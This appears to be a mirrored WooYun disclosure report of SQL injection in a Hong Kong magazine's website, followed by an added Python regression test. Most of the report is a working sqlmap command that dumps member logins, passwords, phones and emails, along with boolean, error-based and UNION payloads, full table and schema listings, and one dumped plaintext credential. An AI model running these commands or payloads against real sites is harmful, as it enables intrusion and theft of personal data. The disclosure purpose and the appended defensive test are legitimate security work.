WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
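2015-11-04: Details reported to the vendor; awaiting vendor handling
2015-11-07: Vendor confirmed; details disclosed to the vendor only
2015-11-17: Details disclosed to core white hats and experts in related fields
2015-11-27: Details disclosed to regular white hats
2015-12-07: Details disclosed to trainee white hats
2015-12-22: Details disclosed to the public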
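U Magazine has been in publication for more than four years and enjoys a strong reputation. After receiving the APMA Best New Magazine in Asia award in 2007 (left), it went on in April 2008 to win two gold awards at the 7th Asia Media Awards 2008 (right): the Gold Award for Best Cover Design (magazine category) and the Gold Award for Best Feature Article (magazine category). This was the first time U Magazine had entered the competition, and its distinctive design for issue 100, "100% Tokyo", beat I Weekly from Singapore (silver) and TIME (bronze). Its "Hong Kong Architecture Series", which covered the transformation of public buildings in an exploration of public space and six young people who construct buildings, took the Gold Award for Best Feature Article. It was the only shortlisted Hong Kong magazine to win two gold awards. In 2009 U Magazine followed up by winning another important Asia-wide award, the bronze award in the landscape category of "Best Travel Photography" at the Asia Travel & Tourism Creative Awards, a win of special significance for U Magazine.
URL: http://**.**.**.**/event_result.php?event_pkey=142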
python sqlmap.py -u "http://**.**.**.**/event_result.php?event_pkey=142" -p event_pkey --technique=BEU --random-agent --batch -D umagazine_v3 -T tbl_member -C login,password,name,mobile_tel,email --dump
---
Parameter: event_pkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT

    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] umagazine_v3

Database: umagazine_v3
[107 tables]
+-----------------------------------+
| tbl_ad                            |
| tbl_admin                         |
| tbl_badwords                      |
| tbl_badwords_bak                  |
| tbl_banner1                       |
| tbl_banner1_item                  |
| tbl_banner2                       |
| tbl_banner2_item                  |
| tbl_banner3                       |
| tbl_banner3_item                  |
| tbl_banner4                       |
| tbl_banner4_item                  |
| tbl_banner5                       |
| tbl_banner5_item                  |
| tbl_cms_doc                       |
| tbl_cms_photo                     |
| tbl_contact                       |
| tbl_content                       |
| tbl_contents_book                 |
| tbl_contents_book_bak2            |
| tbl_contents_book_bak3            |
| tbl_contents_book_desc_photo      |
| tbl_contents_book_desc_photo_bak  |
| tbl_contents_book_desc_photo_bak2 |
| tbl_contents_book_desc_photo_bak3 |
| tbl_contents_book_pages           |
| tbl_contents_book_pages_bak       |
| tbl_contents_book_pages_bak2      |
| tbl_contents_book_pages_bak3      |
| tbl_contents_section              |
| tbl_doclist                       |
| tbl_doclist_item                  |
| tbl_event                         |
| tbl_event_option                  |
| tbl_event_question                |
| tbl_event_result                  |
| tbl_eventalbum                    |
| tbl_eventcontent                  |
| tbl_eventphoto                    |
| tbl_experts                       |
| tbl_forum                         |
| tbl_forum_badword                 |
| tbl_forum_group                   |
| tbl_forum_reply                   |
| tbl_forum_setting                 |
| tbl_forum_topic                   |
| tbl_forum_user_upload_photo       |
| tbl_game                          |
| tbl_gameresult                    |
| tbl_gift                          |
| tbl_gift_option                   |
| tbl_gift_result                   |
| tbl_gift_winner                   |
| tbl_home                          |
| tbl_left_menu                     |
| tbl_link                          |
| tbl_member                        |
| tbl_member_20071026               |
| tbl_member_20080709               |
| tbl_member_bak                    |
| tbl_member_bookmark               |
| tbl_member_forum                  |
| tbl_member_forum_20080709         |
| tbl_member_old                    |
| tbl_page                          |
| tbl_page_content                  |
| tbl_photo                         |
| tbl_photo_album_photo             |
| tbl_photo_album_photo_cat         |
| tbl_photo_poll                    |
| tbl_photo_poll_old                |
| tbl_photo_poll_photo              |
| tbl_photo_poll_photo_old          |
| tbl_photo_rte                     |
| tbl_photo_sharing                 |
| tbl_photo_sharing_country         |
| tbl_photo_sharing_country_group   |
| tbl_photo_sharing_index           |
| tbl_photo_sharing_setup           |
| tbl_poll                          |
| tbl_pollingcontent                |
| tbl_qna                           |
| tbl_story                         |
| tbl_story_country                 |
| tbl_story_country_group           |
| tbl_story_setup                   |
| tbl_test                          |
| tbl_tips                          |
| tbl_tipscontent                   |
| tbl_uclub_promote                 |
| tbl_video                         |
| tbl_video_album_video             |
| tbl_video_album_video_cat         |
| tbl_video_country                 |
| tbl_video_country_group           |
| tbl_video_item                    |
| tbl_vote                          |
| tbl_vote_ite                      |
| tbl_vote_main                     |
| tbl_vote_option                   |
| tbl_vote_photo                    |
| tbl_vote_photo_old                |
| tbl_vote_topic                    |
| tbl_wallpaper                     |
| tbl_wallpaper_country             |
| tbl_wallpaper_country_group       |
| tbl_wallpaper_setup               |
+-----------------------------------+

Database: umagazine_v3
Table: tbl_member
[56 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| version         | int(11)      |
| active          | tinyint(1)   |
| addr_area       | varchar(50)  |
| addr_block      | varchar(50)  |
| addr_building   | varchar(100) |
| addr_district   | varchar(100) |
| addr_estate     | varchar(100) |
| addr_floor      | varchar(50)  |
| addr_room       | varchar(50)  |
| addr_street     | varchar(100) |
| age             | varchar(50)  |
| chi_name        | varchar(50)  |
| dob             | datetime     |
| dob_d           | int(11)      |
| dob_m           | int(11)      |
| education       | varchar(50)  |
| email           | varchar(50)  |
| expense1        | varchar(50)  |
| expense2        | varchar(50)  |
| expense3        | varchar(50)  |
| expense4        | varchar(50)  |
| first_name      | varchar(50)  |
| hkid            | varchar(50)  |
| home_tel        | varchar(50)  |
| income_family   | varchar(50)  |
| income_personal | varchar(50)  |
| internal_remark | text         |
| is_email_list   | tinyint(1)   |
| is_email_list02 | tinyint(1)   |
| is_wc           | tinyint(1)   |
| last_name       | varchar(100) |
| login           | varchar(50)  |
| mobile_tel      | varchar(50)  |
| name            | varchar(50)  |
| occupation      | varchar(50)  |
| password        | varchar(50)  |
| pkey            | int(11)      |
| q1              | text         |
| q2              | text         |
| q3              | text         |
| q4              | text         |
| q5a             | text         |
| q5b             | text         |
| q5c             | text         |
| q5d             | text         |
| q5e             | text         |
| q5f             | text         |
| q5g             | text         |
| q5h             | text         |
| q6              | text         |
| q7              | text         |
| reg_date        | datetime     |
| sex             | varchar(200) |
| tel             | varchar(50)  |
| title           | varchar(10)  |
| total_login     | int(11)      |
+-----------------+--------------+

Database: umagazine_v3
Table: tbl_member
[1 entry]
+---------+----------+---------+------------+---------+
| login   | password | name    | mobile_tel | email   |
+---------+----------+---------+------------+---------+
| richard | 1234     | <blank> | <blank>    | <blank> |
+---------+----------+---------+------------+---------+
Deploy a WAF
Severity: High
Vulnerability Rank: 14
Confirmed at: 2015-11-07 13:09
The incident has been reported to the relevant organization
None yet
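
Added example, not part of the original report or the vendor's code: a regression check built on the boolean-based probe sqlmap reported for event_pkey, run against a string-concatenated lookup and a validated, parameterized one. Python and SQLite stand in for the PHP/MySQL application; the query, the column names, the sample row and the false-condition twin of the probe are assumptions constructed for illustration.

```python
import sqlite3

# Probe reported by sqlmap on the page, and a constructed always-false twin.
TRUE_PROBE = "142' AND 8553=8553 AND 'qUpz'='qUpz"
FALSE_PROBE = "142' AND 8553=8554 AND 'qUpz'='qUpz"


def make_db():
    """In-memory stand-in database with one constructed row (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbl_event_result (event_pkey INTEGER, title TEXT)")
    db.execute("INSERT INTO tbl_event_result VALUES (142, 'sample event')")
    return db


def lookup_vulnerable(db, event_pkey):
    # The 'before' pattern: the parameter is pasted into a quoted literal,
    # so a single quote in the input ends the literal and extends the WHERE clause.
    sql = ("SELECT title FROM tbl_event_result WHERE event_pkey = '"
           + event_pkey + "'")
    return db.execute(sql).fetchall()


def lookup_hardened(db, event_pkey):
    # Allow-list validation: the key is a short decimal integer, nothing else.
    if not (event_pkey.isascii() and event_pkey.isdigit()
            and len(event_pkey) <= 10):
        raise ValueError("event_pkey must be a decimal integer")
    # Bound parameter: the value is never parsed as SQL text.
    return db.execute(
        "SELECT title FROM tbl_event_result WHERE event_pkey = ?",
        (int(event_pkey),),
    ).fetchall()


def has_boolean_oracle(lookup, db):
    """True when the true and false probes produce different responses,
    which is the signal a boolean-based blind test relies on."""
    responses = []
    for probe in (TRUE_PROBE, FALSE_PROBE):
        try:
            responses.append(lookup(db, probe))
        except ValueError:
            responses.append("rejected")
    return responses[0] != responses[1]
```

The same true/false pair can be replayed against the real endpoint after a fix: identical responses for both mean the parameter no longer reaches the SQL parser, whether or not a WAF sits in front of it.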